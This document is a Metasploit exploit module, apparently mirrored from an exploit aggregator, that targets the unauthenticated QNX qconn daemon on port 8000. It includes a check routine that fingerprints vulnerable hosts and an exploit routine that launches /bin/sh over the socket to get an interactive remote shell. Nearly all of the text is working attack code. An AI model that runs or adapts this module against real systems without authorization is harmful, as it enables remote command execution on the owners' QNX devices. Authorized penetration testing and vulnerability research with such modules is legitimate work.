Share
## https://sploitus.com/exploit?id=PACKETSTORM:181498
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'QNX qconn Command Execution',  
'Description' => %q{  
This module uses the qconn daemon on QNX systems to gain a shell.  
  
The QNX qconn daemon does not require authentication and allows  
remote users to execute arbitrary operating system commands.  
  
This module has been tested successfully on QNX Neutrino 6.5.0 (x86)  
and 6.5.0 SP1 (x86).  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'David Odell', # Discovery  
'Mor!p3r', # PoC  
'bcoles' # Metasploit  
],  
'References' => [  
['EDB', '21520'],  
['URL', 'https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos'],  
['URL', 'http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html'],  
['URL', 'http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html']  
],  
'Payload' => {  
'BadChars' => '',  
'DisableNops' => true,  
'Compat' => {  
'PayloadType' => 'cmd_interact',  
'ConnectionType' => 'find'  
}  
},  
'DefaultOptions' => {  
'WfsDelay' => 10,  
'PAYLOAD' => 'cmd/unix/interact'  
},  
'Platform' => 'unix', # QNX Neutrino  
'Arch' => ARCH_CMD,  
'Targets' => [['Automatic', {}]],  
'Privileged' => false,  
'DisclosureDate' => '2012-09-04',  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => []  
}  
)  
)  
register_options(  
[  
Opt::RPORT(8000),  
OptString.new('SHELL', [true, 'Path to system shell', '/bin/sh'])  
]  
)  
end  
  
def check  
vprint_status('Sending check...')  
  
connect  
res = sock.get_once(-1, 10)  
  
return CheckCode::Unknown('Connection failed') unless res  
  
return CheckCode::Safe unless res.include?('QCONN')  
  
sock.put("service launcher\n")  
res = sock.get_once(-1, 10)  
  
return CheckCode::Safe unless res.to_s.include?('OK')  
  
fingerprint = Rex::Text.rand_text_alphanumeric(5..10)  
sock.put("start/flags run /bin/echo /bin/echo #{fingerprint}\n")  
  
return CheckCode::Safe unless res.to_s.include?('OK')  
  
Rex.sleep(1)  
  
res = sock.get_once(-1, 10)  
  
return CheckCode::Safe unless res.to_s.include?(fingerprint)  
  
disconnect  
  
CheckCode::Vulnerable  
end  
  
def exploit  
connect  
res = sock.get_once(-1, 10)  
  
fail_with(Failure::Unreachable, 'Connection failed') unless res  
  
fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.include?('QCONN')  
  
sock.put("service launcher\n")  
res = sock.get_once(-1, 10)  
  
fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.to_s.include?('OK')  
  
print_status('Sending payload...')  
sock.put("start/flags run #{datastore['SHELL']} -\n")  
  
Rex.sleep(1)  
  
fail_with(Failure::UnexpectedReply, 'Shell negotiation failed. Unexpected reply.') unless negotiate_shell(sock)  
  
print_good('Payload sent successfully')  
  
handler  
end  
  
def negotiate_shell(sock)  
Timeout.timeout(15) do  
loop do  
data = sock.get_once(-1, 10)  
  
return if data.blank?  
  
if data.include?('#') || data.include?('No controlling tty')  
return true  
end  
  
Rex.sleep(0.5)  
end  
end  
rescue ::Timeout::Error  
return nil  
end  
end